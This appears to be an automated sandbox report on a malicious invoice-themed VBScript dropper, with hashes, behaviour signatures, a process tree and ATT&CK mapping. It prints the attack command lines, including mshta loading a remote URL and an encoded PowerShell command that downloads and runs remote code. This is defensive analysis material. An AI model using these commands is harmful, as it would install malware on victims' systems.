695c7c580690a30a5454ab156ad21d44da887098ad00b2cfff3b9b11e80b4c6d

General

Target

Invoice-ID43739424297.vbs
Size

305B
MD5

e78c88623c207166afa977ddb0afefc4
SHA1

ad5bc3c62e12ca88fc6bd8e51001156e379433fb
SHA256

695c7c580690a30a5454ab156ad21d44da887098ad00b2cfff3b9b11e80b4c6d
SHA512

9e13dfb091903e31d3ff535c17f0952e6445252f12101c777e31a590bae626833259de999bf5d621de4c0270a0a036bab6db84d1fa72dd0b727253a2c88046c2

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.minpic.de/k/bgnt/ce637

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

6 1428 mshta.exe
8 1428 mshta.exe
9 1532 powershell.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

flow	pid	process
6	1428	mshta.exe
8	1428	mshta.exe
9	1532	powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exe

pid	process
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeIncreaseQuotaPrivilege	1532	powershell.exe
Token: SeSecurityPrivilege	1532	powershell.exe
Token: SeTakeOwnershipPrivilege	1532	powershell.exe
Token: SeLoadDriverPrivilege	1532	powershell.exe
Token: SeSystemProfilePrivilege	1532	powershell.exe
Token: SeSystemtimePrivilege	1532	powershell.exe
Token: SeProfSingleProcessPrivilege	1532	powershell.exe
Token: SeIncBasePriorityPrivilege	1532	powershell.exe
Token: SeCreatePagefilePrivilege	1532	powershell.exe
Token: SeBackupPrivilege	1532	powershell.exe
Token: SeRestorePrivilege	1532	powershell.exe
Token: SeShutdownPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeSystemEnvironmentPrivilege	1532	powershell.exe
Token: SeRemoteShutdownPrivilege	1532	powershell.exe
Token: SeUndockPrivilege	1532	powershell.exe
Token: SeManageVolumePrivilege	1532	powershell.exe
Token: 33	1532	powershell.exe
Token: 34	1532	powershell.exe
Token: 35	1532	powershell.exe
Token: SeIncreaseQuotaPrivilege	1532	powershell.exe
Token: SeSecurityPrivilege	1532	powershell.exe
Token: SeTakeOwnershipPrivilege	1532	powershell.exe
Token: SeLoadDriverPrivilege	1532	powershell.exe
Token: SeSystemProfilePrivilege	1532	powershell.exe
Token: SeSystemtimePrivilege	1532	powershell.exe
Token: SeProfSingleProcessPrivilege	1532	powershell.exe
Token: SeIncBasePriorityPrivilege	1532	powershell.exe
Token: SeCreatePagefilePrivilege	1532	powershell.exe
Token: SeBackupPrivilege	1532	powershell.exe
Token: SeRestorePrivilege	1532	powershell.exe
Token: SeShutdownPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeSystemEnvironmentPrivilege	1532	powershell.exe
Token: SeRemoteShutdownPrivilege	1532	powershell.exe
Token: SeUndockPrivilege	1532	powershell.exe
Token: SeManageVolumePrivilege	1532	powershell.exe
Token: 33	1532	powershell.exe
Token: 34	1532	powershell.exe
Token: 35	1532	powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

WScript.exemshta.exepowershell.exe

description	pid	process	target process
PID 1916 wrote to memory of 1428	1916	WScript.exe	mshta.exe
PID 1916 wrote to memory of 1428	1916	WScript.exe	mshta.exe
PID 1916 wrote to memory of 1428	1916	WScript.exe	mshta.exe
PID 1428 wrote to memory of 1532	1428	mshta.exe	powershell.exe
PID 1428 wrote to memory of 1532	1428	mshta.exe	powershell.exe
PID 1428 wrote to memory of 1532	1428	mshta.exe	powershell.exe
PID 1532 wrote to memory of 1620	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1620	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1620	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1620	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1548	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1548	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1548	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1548	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1908	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1908	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1908	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1908	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1736	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1736	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1736	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1736	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1608	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1608	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1608	1532	powershell.exe	MSBuild.exe
PID 1532 wrote to memory of 1608	1532	powershell.exe	MSBuild.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice-ID43739424297.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1916

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://www.minpic.de/k/bgnu/n5z5u
2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBgAEUAWAAgACgAKABuAGAAZQBgAFcAYAAtAE8AYgBqAGAARQBgAGMAYABUACAAKAAoACcATgBlAHQAJwArACcALgAnACsAJwBXAGUAYgBjACcAKwAnAGwAaQBlAG4AdAAnACkAKQApAC4AKAAoACcARAAnACsAJwBvACcAKwAnAHcAJwArACcAbgAnACsAJwBsACcAKwAnAG8AJwArACcAYQAnACsAJwBkACcAKwAnAHMAJwArACcAdAByAGkAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAbgAnACsAJwBnACcAKQApAC4ASQBuAFYAbwBrAEUAKAAoACgAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAbgBwAGkAYwAuAGQAZQAvAGsALwBiAGcAbgB0AC8AYwBlADYAMwA3ACcAKQApACkAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAFwAfAAvACcALAAnACgAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAXABcACcALAAnACkAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAXAAvACcALAAnAHsAJwApAC4AcgBlAHAAbABhAGMAZQAoACcALwBcACcALAAnAH0AJwApAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1620

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1608

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1736

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1908

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1548

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1428-2-0x0000000000000000-mapping.dmp

Download
memory/1532-8-0x000000001ACA0000-0x000000001ACA1000-memory.dmp

Filesize
4KB

Download
memory/1532-5-0x0000000000000000-mapping.dmp

Download
memory/1532-6-0x000007FEF2F20000-0x000007FEF390C000-memory.dmp

Filesize
9.9MB

Download
memory/1532-7-0x0000000002360000-0x0000000002361000-memory.dmp

Filesize
4KB

Download
memory/1532-9-0x00000000024A0000-0x00000000024A1000-memory.dmp

Filesize
4KB

Download
memory/1532-10-0x0000000002560000-0x0000000002561000-memory.dmp

Filesize
4KB

Download
memory/1532-11-0x000000001B550000-0x000000001B551000-memory.dmp

Filesize
4KB

Download
memory/1532-12-0x000000001AA30000-0x000000001AA31000-memory.dmp

Filesize
4KB

Download
memory/1532-13-0x000000001B6C0000-0x000000001B6C7000-memory.dmp

Filesize
28KB

Download
memory/1532-14-0x000000001B6D0000-0x000000001B6D8000-memory.dmp

Filesize
32KB

Download
memory/1816-4-0x000007FEF76B0000-0x000007FEF792A000-memory.dmp

Filesize
2.5MB

Download
memory/1916-3-0x0000000002760000-0x0000000002764000-memory.dmp

Filesize
16KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads